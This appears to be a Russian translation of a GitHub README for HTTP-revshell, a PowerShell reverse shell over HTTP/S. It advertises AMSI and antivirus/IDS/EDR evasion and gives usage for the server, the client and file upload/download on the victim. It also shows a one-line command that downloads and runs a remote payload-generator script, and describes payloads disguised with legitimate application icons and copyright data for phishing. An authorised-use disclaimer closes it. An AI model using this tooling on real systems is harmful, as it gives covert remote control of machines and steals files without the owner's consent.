
Обратная оболочка PowerShell с использованием протокола HTTP/S с обходом AMSI и поддержкой прокси
HTTP-revshell — это инструмент, ориентированный на упражнения Red Team и пентестеров. Данный инструмент обеспечивает обратное соединение через протокол http/s. Он использует скрытый канал для получения контроля над машиной жертвы посредством веб-запросов, обходя такие решения, как IDS, IPS и AV.
ПРИМЕЧАНИЕ: Инструмент не будет поддерживаться в части обхода. Всего несколько изменений позволят обойти многие EDR на рынке.

Использование сервера:
usage: server.py [-h] [--ssl] [--autocomplete] host port
positional arguments:
host Listen Host
port Listen Port
optional arguments:
-h, --help show this help message and exit
--ssl Send traffic over ssl
--autocomplete Autocomplete powershell functions
Использование клиента:
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt
Эта функция позволяет загрузить любой файл на машину жертвы.
Использование:
upload /src/path/file C:\dest\path\file
Эта функция позволяет скачать файл на машину атакующего.
Использование:
download C:\src\path\file /dst/path/file
Эта функция позволяет загружать PowerShell-скрипты без записи на диск жертвы, читая файл через легитимный HTTP-трафик.
Использование:
loadps1 /path/to/the/local/server/PowershellScript.ps1
Этот скрипт позволяет создать исполняемый файл с полезной нагрузкой, необходимой для использования HTTP-revshell; вам просто нужно следовать инструкциям на экране для его генерации. Доступно 6 предопределённых шаблонов и один настраиваемый с нужными вам данными.
Сгенерированные инструментом полезные нагрузки включают легитимную иконку приложения, а также информацию о продукте и авторских правах оригинального приложения. Кроме того, каждая из них открывает оригинальное приложение перед установкой соединения с сервером, имитируя легитимное приложение. Это можно использовать для фишинга или упражнений Red Team.
Использование генератора полезной нагрузки:
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

ВАЖНО: Все поля в предопределённых шаблонах автоматически заполняются нажатием клавиши Enter.
Этот скрипт распространяется под лицензией LGPLv3+. Прямая ссылка на Лицензию.
HTTP-revshell следует использовать только для авторизованного тестирования на проникновение и/или некоммерческих образовательных целей. Любое неправомерное использование данного программного обеспечения не является ответственностью автора или любого другого соавтора. Используйте его на своих собственных серверах и/или с разрешения владельца сервера.